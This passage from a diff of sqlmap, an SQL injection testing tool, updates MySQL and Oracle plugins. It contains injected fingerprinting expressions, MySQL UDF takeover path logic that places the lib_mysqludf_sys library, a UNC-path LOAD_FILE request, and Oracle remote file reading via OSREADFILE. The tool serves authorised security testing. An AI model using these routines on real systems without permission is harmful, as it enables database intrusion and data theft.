version[0] == "3": - midVer = prevVer[1:3] + midVer = version[1:3] else: - midVer = prevVer[2] + midVer = version[2] - trueVer = "%s.%s.%s" % (prevVer[0], midVer, prevVer[3:]) + trueVer = "%s.%s.%s" % (version[0], midVer, version[3:]) return trueVer - prevVer = version - return None def getFingerprint(self): + fork = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK) + + if fork is None: + if inject.checkBooleanExpression("VERSION() LIKE '%MariaDB%'"): + fork = FORK.MARIADB + elif inject.checkBooleanExpression("VERSION() LIKE '%TiDB%'"): + fork = FORK.TIDB + elif inject.checkBooleanExpression("@@VERSION_COMMENT LIKE '%drizzle%'"): + fork = FORK.DRIZZLE + elif inject.checkBooleanExpression("@@VERSION_COMMENT LIKE '%Percona%'"): + fork = FORK.PERCONA + elif inject.checkBooleanExpression("@@VERSION_COMMENT LIKE '%Doris%'"): + fork = FORK.DORIS + elif inject.checkBooleanExpression("@@VERSION_COMMENT LIKE '%StarRocks%'"): + fork = FORK.STARROCKS + elif inject.checkBooleanExpression("AURORA_VERSION() LIKE '%'"): # Reference: https://aws.amazon.com/premiumsupport/knowledge-center/aurora-version-number/ + fork = FORK.AURORA + else: + fork = "" + + hashDBWrite(HASHDB_KEYS.DBMS_FORK, fork) + value = "" wsOsFp = Format.getOs("web server", kb.headersFp) - if wsOsFp: + if wsOsFp and not conf.api: value += "%s\n" % wsOsFp if kb.data.banner: dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - if dbmsOsFp: + if dbmsOsFp and not conf.api: value += "%s\n" % dbmsOsFp value += "back-end DBMS: " @@ -109,6 +132,8 @@ def getFingerprint(self): if not conf.extensiveFp: value += actVer + if fork: + value += " (%s fork)" % fork return value comVer = self._commentCheck() @@ -120,19 +145,23 @@ def getFingerprint(self): value += "\n%scomment injection fingerprint: %s" % (blank, comVer) if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None + banVer = kb.bannerFp.get("dbmsVersion") - if re.search("-log$", kb.data.banner): - banVer += ", logging enabled" + if banVer: + if banVer and re.search(r"-log$", kb.data.banner or ""): + banVer += ", logging enabled" - banVer = Format.getDbms([banVer] if banVer else None) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) htmlErrorFp = Format.getErrorParsedDBMSes() if htmlErrorFp: value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + if fork: + value += "\n%sfork fingerprint: %s" % (blank, fork) + return value def checkDbms(self): @@ -146,20 +175,11 @@ def checkDbms(self): * http://dev.mysql.com/doc/refman/6.0/en/news-6-0-x.html (manual has been withdrawn) """ - if not conf.extensiveFp and (Backend.isDbmsWithin(MYSQL_ALIASES) \ - or conf.dbms in MYSQL_ALIASES) and Backend.getVersion() and \ - Backend.getVersion() != UNKNOWN_DBMS_VERSION: - v = Backend.getVersion().replace(">", "") - v = v.replace("=", "") - v = v.replace(" ", "") - - Backend.setVersion(v) - + if not conf.extensiveFp and Backend.isDbmsWithin(MYSQL_ALIASES): setDbms("%s %s" % (DBMS.MYSQL, Backend.getVersion())) - if Backend.isVersionGreaterOrEqualThan("5"): + if Backend.isVersionGreaterOrEqualThan("5") or inject.checkBooleanExpression("DATABASE() LIKE SCHEMA()"): kb.data.has_information_schema = True - self.getBanner() return True @@ -167,27 +187,46 @@ def checkDbms(self): infoMsg = "testing %s" % DBMS.MYSQL logger.info(infoMsg) - randInt = getUnicode(randomInt(1)) - result = inject.checkBooleanExpression("QUARTER(NULL) IS NULL") + result = inject.checkBooleanExpression("IFNULL(QUARTER(NULL),NULL XOR NULL) IS NULL") if result: infoMsg = "confirming %s" % DBMS.MYSQL logger.info(infoMsg) - result = inject.checkBooleanExpression("USER() LIKE USER()") + result = inject.checkBooleanExpression("COALESCE(SESSION_USER(),USER()) IS NOT NULL") + + if not result: + # Note: MemSQL doesn't support SESSION_USER() + result = inject.checkBooleanExpression("GEOGRAPHY_AREA(NULL) IS NULL") + + if result: + hashDBWrite(HASHDB_KEYS.DBMS_FORK, FORK.MEMSQL) if not result: warnMsg = "the back-end DBMS is not %s" % DBMS.MYSQL - logger.warn(warnMsg) + logger.warning(warnMsg) return False # reading information_schema on some platforms is causing annoying timeout exits # Reference: http://bugs.mysql.com/bug.php?id=15855 + kb.data.has_information_schema = True + + # Determine if it is MySQL >= 9.0.0 + if inject.checkBooleanExpression("ISNULL(VECTOR_DIM(NULL))"): + Backend.setVersion(">= 9.0.0") + setDbms("%s 9" % DBMS.MYSQL) + self.getBanner() + + # Determine if it is MySQL >= 8.0.0 + elif inject.checkBooleanExpression("ISNULL(JSON_STORAGE_FREE(NULL))"): + Backend.setVersion(">= 8.0.0") + setDbms("%s 8" % DBMS.MYSQL) + self.getBanner() + # Determine if it is MySQL >= 5.0.0 - if inject.checkBooleanExpression("ISNULL(TIMESTAMPADD(MINUTE,%s,%s))" % (randInt, randInt)): - kb.data.has_information_schema = True + elif inject.checkBooleanExpression("ISNULL(TIMESTAMPADD(MINUTE,[RANDNUM],NULL))"): Backend.setVersion(">= 5.0.0") setDbms("%s 5" % DBMS.MYSQL) self.getBanner() @@ -198,19 +237,27 @@ def checkDbms(self): infoMsg = "actively fingerprinting %s" % DBMS.MYSQL logger.info(infoMsg) - # Check if it is MySQL >= 5.5.0 - if inject.checkBooleanExpression("TO_SECONDS(950501)>0"): - Backend.setVersion(">= 5.5.0") + # Check if it is MySQL >= 5.7 + if inject.checkBooleanExpression("ISNULL(JSON_QUOTE(NULL))"): + Backend.setVersion(">= 5.7") + + # Check if it is MySQL >= 5.6 + elif inject.checkBooleanExpression("ISNULL(VALIDATE_PASSWORD_STRENGTH(NULL))"): + Backend.setVersion(">= 5.6") + + # Check if it is MySQL >= 5.5 + elif inject.checkBooleanExpression("TO_SECONDS(950501)>0"): + Backend.setVersion(">= 5.5") # Check if it is MySQL >= 5.1.2 and < 5.5.0 elif inject.checkBooleanExpression("@@table_open_cache=@@table_open_cache"): - if inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.GLOBAL_STATUS LIMIT 0, 1)" % (randInt, randInt)): + if inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM information_schema.GLOBAL_STATUS LIMIT 0, 1)"): Backend.setVersionList([">= 5.1.12", "< 5.5.0"]) - elif inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.PROCESSLIST LIMIT 0, 1)" % (randInt, randInt)): + elif inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM information_schema.PROCESSLIST LIMIT 0, 1)"): Backend.setVersionList([">= 5.1.7", "< 5.1.12"]) - elif inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.PARTITIONS LIMIT 0, 1)" % (randInt, randInt)): + elif inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM information_schema.PARTITIONS LIMIT 0, 1)"): Backend.setVersion("= 5.1.6") - elif inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.PLUGINS LIMIT 0, 1)" % (randInt, randInt)): + elif inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM information_schema.PLUGINS LIMIT 0, 1)"): Backend.setVersionList([">= 5.1.5", "< 5.1.6"]) else: Backend.setVersionList([">= 5.1.2", "< 5.1.5"]) @@ -220,7 +267,7 @@ def checkDbms(self): Backend.setVersionList([">= 5.0.38", "< 5.1.2"]) elif inject.checkBooleanExpression("@@character_set_filesystem=@@character_set_filesystem"): Backend.setVersionList([">= 5.0.19", "< 5.0.38"]) - elif not inject.checkBooleanExpression("%s=(SELECT %s FROM DUAL WHERE %s!=%s)" % (randInt, randInt, randInt, randInt)): + elif not inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM DUAL WHERE [RANDNUM1]!=[RANDNUM2])"): Backend.setVersionList([">= 5.0.11", "< 5.0.19"]) elif inject.checkBooleanExpression("@@div_precision_increment=@@div_precision_increment"): Backend.setVersionList([">= 5.0.6", "< 5.0.11"]) @@ -229,7 +276,6 @@ def checkDbms(self): else: Backend.setVersionList([">= 5.0.0", "< 5.0.3"]) - # For cases when information_schema is missing elif inject.checkBooleanExpression("DATABASE() LIKE SCHEMA()"): Backend.setVersion(">= 5.0.2") setDbms("%s 5" % DBMS.MYSQL) @@ -240,6 +286,8 @@ def checkDbms(self): setDbms("%s 4" % DBMS.MYSQL) self.getBanner() + kb.data.has_information_schema = False + if not conf.extensiveFp: return True @@ -262,10 +310,12 @@ def checkDbms(self): setDbms("%s 3" % DBMS.MYSQL) self.getBanner() + kb.data.has_information_schema = False + return True else: warnMsg = "the back-end DBMS is not %s" % DBMS.MYSQL - logger.warn(warnMsg) + logger.warning(warnMsg) return False diff --git a/plugins/dbms/mysql/syntax.py b/plugins/dbms/mysql/syntax.py index f1ff5afc9d5..fefe4d88b1a 100644 --- a/plugins/dbms/mysql/syntax.py +++ b/plugins/dbms/mysql/syntax.py @@ -1,27 +1,31 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import binascii -from lib.core.convert import utf8encode +from lib.core.convert import getBytes +from lib.core.convert import getOrds +from lib.core.convert import getUnicode from plugins.generic.syntax import Syntax as GenericSyntax class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - @staticmethod def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT 0x6162636465666768 FROM foobar" + True + >>> Syntax.escape(u"SELECT 'abcd\xebfgh' FROM foobar") == "SELECT CONVERT(0x61626364c3ab666768 USING utf8) FROM foobar" + True + """ + def escaper(value): - retVal = None - try: - retVal = "0x%s" % binascii.hexlify(value.strip("'")) - except UnicodeEncodeError: - retVal = "CONVERT(0x%s USING utf8)" % "".join("%.2x" % ord(_) for _ in utf8encode(value.strip("'"))) - return retVal + if all(_ < 128 for _ in getOrds(value)): + return "0x%s" % getUnicode(binascii.hexlify(getBytes(value))) + else: + return "CONVERT(0x%s USING utf8)" % getUnicode(binascii.hexlify(getBytes(value, "utf8"))) return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/mysql/takeover.py b/plugins/dbms/mysql/takeover.py index 41ebd1135f8..81851506412 100644 --- a/plugins/dbms/mysql/takeover.py +++ b/plugins/dbms/mysql/takeover.py @@ -1,24 +1,26 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import re +import os from lib.core.agent import agent from lib.core.common import Backend -from lib.core.common import isTechniqueAvailable +from lib.core.common import decloakToTemp +from lib.core.common import isStackingAvailable +from lib.core.common import isWindowsDriveLetterPath from lib.core.common import normalizePath from lib.core.common import ntToPosixSlashes from lib.core.common import randomStr from lib.core.common import unArrayizeValue +from lib.core.compat import LooseVersion from lib.core.data import kb from lib.core.data import logger from lib.core.data import paths from lib.core.enums import OS -from lib.core.enums import PAYLOAD from lib.request import inject from lib.request.connect import Connect as Request from plugins.generic.takeover import Takeover as GenericTakeover @@ -27,6 +29,7 @@ class Takeover(GenericTakeover): def __init__(self): self.__basedir = None self.__datadir = None + self.__plugindir = None GenericTakeover.__init__(self) @@ -35,39 +38,44 @@ def udfSetRemotePath(self): banVer = kb.bannerFp["dbmsVersion"] - # On MySQL 5.1 >= 5.1.19 and on any version of MySQL 6.0 - if banVer >= "5.1.19": - if self.__basedir is None: + if banVer and LooseVersion(banVer) >= LooseVersion("5.0.67"): + if self.__plugindir is None: + logger.info("retrieving MySQL plugin directory absolute path") + self.__plugindir = unArrayizeValue(inject.getValue("SELECT @@plugin_dir")) + + # On MySQL 5.1 >= 5.1.19 and on any version of MySQL 6.0 + if self.__plugindir is None and LooseVersion(banVer) >= LooseVersion("5.1.19"): logger.info("retrieving MySQL base directory absolute path") # Reference: http://dev.mysql.com/doc/refman/5.1/en/server-options.html#option_mysqld_basedir self.__basedir = unArrayizeValue(inject.getValue("SELECT @@basedir")) - if re.search("^[\w]\:[\/\\\\]+", self.__basedir, re.I): + if isWindowsDriveLetterPath(self.__basedir or ""): Backend.setOs(OS.WINDOWS) else: Backend.setOs(OS.LINUX) - # The DLL must be in C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin - if Backend.isOs(OS.WINDOWS): - self.__basedir += "/lib/plugin" - else: - self.__basedir += "/lib/mysql/plugin" + # The DLL must be in C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin + if Backend.isOs(OS.WINDOWS): + self.__plugindir = "%s/lib/plugin" % self.__basedir + else: + self.__plugindir = "%s/lib/mysql/plugin" % self.__basedir + + self.__plugindir = ntToPosixSlashes(normalizePath(self.__plugindir)) or '.' - self.__basedir = ntToPosixSlashes(normalizePath(self.__basedir)) - self.udfRemoteFile = "%s/%s.%s" % (self.__basedir, self.udfSharedLibName, self.udfSharedLibExt) + self.udfRemoteFile = "%s/%s.%s" % (self.__plugindir, self.udfSharedLibName, self.udfSharedLibExt) # On MySQL 4.1 < 4.1.25 and on MySQL 4.1 >= 4.1.25 with NO plugin_dir set in my.ini configuration file # On MySQL 5.0 < 5.0.67 and on MySQL 5.0 >= 5.0.67 with NO plugin_dir set in my.ini configuration file else: - #logger.debug("retrieving MySQL data directory absolute path") + # logger.debug("retrieving MySQL data directory absolute path") # Reference: http://dev.mysql.com/doc/refman/5.1/en/server-options.html#option_mysqld_datadir - #self.__datadir = inject.getValue("SELECT @@datadir") + # self.__datadir = inject.getValue("SELECT @@datadir") # NOTE: specifying the relative path as './udf.dll' # saves in @@datadir on both MySQL 4.1 and MySQL 5.0 - self.__datadir = "." + self.__datadir = '.' self.__datadir = ntToPosixSlashes(normalizePath(self.__datadir)) # The DLL can be in either C:\WINDOWS, C:\WINDOWS\system, @@ -79,10 +87,12 @@ def udfSetLocalPaths(self): self.udfSharedLibName = "libs%s" % randomStr(lowercase=True) if Backend.isOs(OS.WINDOWS): - self.udfLocalFile += "/mysql/windows/%d/lib_mysqludf_sys.dll" % Backend.getArch() + _ = os.path.join(self.udfLocalFile, "mysql", "windows", "%d" % Backend.getArch(), "lib_mysqludf_sys.dll_") + self.udfLocalFile = decloakToTemp(_) self.udfSharedLibExt = "dll" else: - self.udfLocalFile += "/mysql/linux/%d/lib_mysqludf_sys.so" % Backend.getArch() + _ = os.path.join(self.udfLocalFile, "mysql", "linux", "%d" % Backend.getArch(), "lib_mysqludf_sys.so_") + self.udfLocalFile = decloakToTemp(_) self.udfSharedLibExt = "so" def udfCreateFromSharedLib(self, udf, inpRet): @@ -100,7 +110,7 @@ def udfCreateFromSharedLib(self, udf, inpRet): logger.debug("keeping existing UDF '%s' as requested" % udf) def uncPathRequest(self): - if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): + if not isStackingAvailable(): query = agent.prefixQuery("AND LOAD_FILE('%s')" % self.uncPath) query = agent.suffixQuery(query) payload = agent.payload(newValue=query) diff --git a/plugins/dbms/oracle/__init__.py b/plugins/dbms/oracle/__init__.py index 1a09a1be9e2..cedb15250e4 100644 --- a/plugins/dbms/oracle/__init__.py +++ b/plugins/dbms/oracle/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.enums import DBMS @@ -23,11 +23,7 @@ class OracleMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Tak def __init__(self): self.excludeDbsList = ORACLE_SYSTEM_DBS - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) + for cls in self.__class__.__bases__: + cls.__init__(self) unescaper[DBMS.ORACLE] = Syntax.escape diff --git a/plugins/dbms/oracle/connector.py b/plugins/dbms/oracle/connector.py index a536d5fa55f..0d011fb8afd 100644 --- a/plugins/dbms/oracle/connector.py +++ b/plugins/dbms/oracle/connector.py @@ -1,19 +1,20 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ try: - import cx_Oracle + import oracledb except ImportError: pass import logging import os -from lib.core.convert import utf8encode +from lib.core.common import getSafeExString +from lib.core.convert import getText from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapConnectionException @@ -23,52 +24,48 @@ class Connector(GenericConnector): """ - Homepage: http://cx-oracle.sourceforge.net/ - User guide: http://cx-oracle.sourceforge.net/README.txt - API: http://cx-oracle.sourceforge.net/html/index.html - License: http://cx-oracle.sourceforge.net/LICENSE.txt + Homepage: https://oracle.github.io/python-oracledb/ + User: https://python-oracledb.readthedocs.io/en/latest/ + License: https://github.com/oracle/python-oracledb/blob/main/LICENSE.txt """ - def __init__(self): - GenericConnector.__init__(self) - def connect(self): self.initConnection() - self.__dsn = cx_Oracle.makedsn(self.hostname, self.port, self.db) - self.__dsn = utf8encode(self.__dsn) - self.user = utf8encode(self.user) - self.password = utf8encode(self.password) + + self.user = getText(self.user) + self.password = getText(self.password) try: - self.connector = cx_Oracle.connect(dsn=self.__dsn, user=self.user, password=self.password, mode=cx_Oracle.SYSDBA) + dsn = oracledb.makedsn(self.hostname, self.port, service_name=self.db) + self.connector = oracledb.connect(user=self.user, password=self.password, dsn=dsn, mode=oracledb.AUTH_MODE_SYSDBA) logger.info("successfully connected as SYSDBA") - except (cx_Oracle.OperationalError, cx_Oracle.DatabaseError): + except oracledb.DatabaseError: + # Try again without SYSDBA try: - self.connector = cx_Oracle.connect(dsn=self.__dsn, user=self.user, password=self.password) - except (cx_Oracle.OperationalError, cx_Oracle.DatabaseError), msg: - raise SqlmapConnectionException(msg) + self.connector = oracledb.connect(user=self.user, password=self.password, dsn=dsn) + except oracledb.DatabaseError as ex: + raise SqlmapConnectionException(ex) self.initCursor() - self.connected() + self.printConnected() def fetchall(self): try: return self.cursor.fetchall() - except cx_Oracle.InterfaceError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg) + except oracledb.InterfaceError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex)) return None def execute(self, query): retVal = False try: - self.cursor.execute(utf8encode(query)) + self.cursor.execute(getText(query)) retVal = True - except cx_Oracle.DatabaseError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg) + except oracledb.DatabaseError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex)) self.connector.commit() - return retVal def select(self, query): diff --git a/plugins/dbms/oracle/enumeration.py b/plugins/dbms/oracle/enumeration.py index 3344870d94a..96b1a262cd2 100644 --- a/plugins/dbms/oracle/enumeration.py +++ b/plugins/dbms/oracle/enumeration.py @@ -1,38 +1,37 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -from lib.core.common import Backend from lib.core.common import getLimitRange from lib.core.common import isAdminFromPrivileges from lib.core.common import isInferenceAvailable from lib.core.common import isNoneValue from lib.core.common import isNumPosStrValue from lib.core.common import isTechniqueAvailable +from lib.core.compat import xrange from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries from lib.core.enums import CHARSET_TYPE +from lib.core.enums import DBMS from lib.core.enums import EXPECTED from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapNoneDataException +from lib.core.settings import CURRENT_USER from lib.request import inject from plugins.generic.enumeration import Enumeration as GenericEnumeration class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - def getRoles(self, query2=False): infoMsg = "fetching database users roles" - rootQuery = queries[Backend.getIdentifiedDbms()].roles + rootQuery = queries[DBMS.ORACLE].roles - if conf.user == "CU": + if conf.user == CURRENT_USER: infoMsg += " for current user" conf.user = self.getCurrentUser() @@ -50,14 +49,14 @@ def getRoles(self, query2=False): condition = rootQuery.inband.condition if conf.user: - users = conf.user.split(",") + users = conf.user.split(',') query += " WHERE " query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) values = inject.getValue(query, blind=False, time=False) if not values and not query2: - infoMsg = "trying with table USER_ROLE_PRIVS" + infoMsg = "trying with table 'USER_ROLE_PRIVS'" logger.info(infoMsg) return self.getRoles(query2=True) @@ -67,7 +66,7 @@ def getRoles(self, query2=False): user = None roles = set() - for count in xrange(0, len(value)): + for count in xrange(0, len(value or [])): # The first column is always the username if count == 0: user = value[count] @@ -86,7 +85,7 @@ def getRoles(self, query2=False): if not kb.data.cachedUsersRoles and isInferenceAvailable() and not conf.direct: if conf.user: - users = conf.user.split(",") + users = conf.user.split(',') else: if not len(kb.data.cachedUsers): users = self.getUsers() @@ -118,14 +117,14 @@ def getRoles(self, query2=False): if not isNumPosStrValue(count): if count != 0 and not query2: - infoMsg = "trying with table USER_SYS_PRIVS" + infoMsg = "trying with table 'USER_SYS_PRIVS'" logger.info(infoMsg) return self.getPrivileges(query2=True) warnMsg = "unable to retrieve the number of " warnMsg += "roles for user '%s'" % user - logger.warn(warnMsg) + logger.warning(warnMsg) continue infoMsg = "fetching roles for user '%s'" % user @@ -150,7 +149,7 @@ def getRoles(self, query2=False): else: warnMsg = "unable to retrieve the roles " warnMsg += "for user '%s'" % user - logger.warn(warnMsg) + logger.warning(warnMsg) retrievedUsers.add(user) diff --git a/plugins/dbms/oracle/filesystem.py b/plugins/dbms/oracle/filesystem.py index d276a2f5fec..197b9bddc99 100644 --- a/plugins/dbms/oracle/filesystem.py +++ b/plugins/dbms/oracle/filesystem.py @@ -1,23 +1,59 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from lib.core.agent import agent +from lib.core.common import dataToOutFile +from lib.core.common import decodeDbmsHexValue +from lib.core.common import getSQLSnippet +from lib.core.common import isNoneValue +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import CHARSET_TYPE +from lib.core.enums import DBMS from lib.core.exception import SqlmapUnsupportedFeatureException +from lib.request import inject +from lib.request.connect import Connect as Request from plugins.generic.filesystem import Filesystem as GenericFilesystem class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) + def readFile(self, remoteFile): + localFilePaths = [] + snippet = getSQLSnippet(DBMS.ORACLE, "read_file_export_extension") - def readFile(self, rFile): - errMsg = "File system read access not yet implemented for " - errMsg += "Oracle" - raise SqlmapUnsupportedFeatureException(errMsg) + for query in snippet.split("\n"): + query = query.strip() + query = agent.prefixQuery("OR (%s) IS NULL" % query) + query = agent.suffixQuery(query, trimEmpty=False) + payload = agent.payload(newValue=query) + Request.queryPage(payload, content=False, raise404=False, silent=True, noteResponseTime=False) + + for remoteFile in remoteFile.split(','): + if not kb.bruteMode: + infoMsg = "fetching file: '%s'" % remoteFile + logger.info(infoMsg) + + kb.fileReadMode = True + fileContent = inject.getValue("SELECT RAWTOHEX(OSREADFILE('%s')) FROM DUAL" % remoteFile, charsetType=CHARSET_TYPE.HEXADECIMAL) + kb.fileReadMode = False + + if not isNoneValue(fileContent): + fileContent = decodeDbmsHexValue(fileContent, True) + + if fileContent.strip(): + localFilePath = dataToOutFile(remoteFile, fileContent) + localFilePaths.append(localFilePath) + + elif not kb.bruteMode: + errMsg = "no data retrieved" + logger.error(errMsg) + + return localFilePaths - def writeFile(self, wFile, dFile, fileType=None): + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): errMsg = "File system write access not yet implemented for " errMsg += "Oracle" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/oracle/fingerprint.py b/plugins/dbms/oracle/fingerprint.py index 29b5b05d5ca..5eacf432461 100644 --- a/plugins/dbms/oracle/fingerprint.py +++ b/plugins/dbms/oracle/fingerprint.py @@ -1,18 +1,22 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re from lib.core.common import Backend from lib.core.common import Format +from lib.core.common import hashDBRetrieve +from lib.core.common import hashDBWrite from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.enums import DBMS +from lib.core.enums import FORK +from lib.core.enums import HASHDB_KEYS from lib.core.session import setDbms from lib.core.settings import ORACLE_ALIASES from lib.request import inject @@ -23,6 +27,16 @@ def __init__(self): GenericFingerprint.__init__(self, DBMS.ORACLE) def getFingerprint(self): + fork = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK) + + if fork is None: + if inject.checkBooleanExpression("NULL_EQU(NULL,NULL)=1"): + fork = FORK.DM8 + else: + fork = "" + + hashDBWrite(HASHDB_KEYS.DBMS_FORK, fork) + value = "" wsOsFp = Format.getOs("web server", kb.headersFp) @@ -39,6 +53,8 @@ def getFingerprint(self): if not conf.extensiveFp: value += DBMS.ORACLE + if fork: + value += " (%s fork)" % fork return value actVer = Format.getDbms() @@ -46,19 +62,24 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None - banVer = Format.getDbms([banVer]) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) htmlErrorFp = Format.getErrorParsedDBMSes() if htmlErrorFp: value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + if fork: + value += "\n%sfork fingerprint: %s" % (blank, fork) + return value def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(ORACLE_ALIASES) or conf.dbms in ORACLE_ALIASES): + if not conf.extensiveFp and Backend.isDbmsWithin(ORACLE_ALIASES): setDbms(DBMS.ORACLE) self.getBanner() @@ -68,27 +89,27 @@ def checkDbms(self): infoMsg = "testing %s" % DBMS.ORACLE logger.info(infoMsg) - # NOTE: SELECT ROWNUM=ROWNUM FROM DUAL does not work connecting - # directly to the Oracle database + # NOTE: SELECT LENGTH(SYSDATE)=LENGTH(SYSDATE) FROM DUAL does + # not work connecting directly to the Oracle database if conf.direct: result = True else: - result = inject.checkBooleanExpression("ROWNUM=ROWNUM") + result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)") if result: infoMsg = "confirming %s" % DBMS.ORACLE logger.info(infoMsg) - # NOTE: SELECT LENGTH(SYSDATE)=LENGTH(SYSDATE) FROM DUAL does + # NOTE: SELECT NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1]) FROM DUAL does # not work connecting directly to the Oracle database if conf.direct: result = True else: - result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)") + result = inject.checkBooleanExpression("NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1])") if not result: warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE - logger.warn(warnMsg) + logger.warning(warnMsg) return False @@ -102,9 +123,10 @@ def checkDbms(self): infoMsg = "actively fingerprinting %s" % DBMS.ORACLE logger.info(infoMsg) - for version in ("11i", "10g", "9i", "8i"): - number = int(re.search("([\d]+)", version).group(1)) - output = inject.checkBooleanExpression("%d=(SELECT SUBSTR((VERSION), 1, %d) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1)" % (number, 1 if number < 10 else 2)) + # Reference: https://en.wikipedia.org/wiki/Oracle_Database + for version in ("23c", "21c", "19c", "18c", "12c", "11g", "10g", "9i", "8i", "7"): + number = int(re.search(r"([\d]+)", version).group(1)) + output = inject.checkBooleanExpression("%d=(SELECT SUBSTR((VERSION),1,%d) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1)" % (number, 1 if number < 10 else 2)) if output: Backend.setVersion(version) @@ -113,7 +135,7 @@ def checkDbms(self): return True else: warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE - logger.warn(warnMsg) + logger.warning(warnMsg) return False diff --git a/plugins/dbms/oracle/syntax.py b/plugins/dbms/oracle/syntax.py index 3cd775e577d..91e255219dc 100644 --- a/plugins/dbms/oracle/syntax.py +++ b/plugins/dbms/oracle/syntax.py @@ -1,19 +1,24 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from lib.core.convert import getOrds from plugins.generic.syntax import Syntax as GenericSyntax class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - @staticmethod def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT 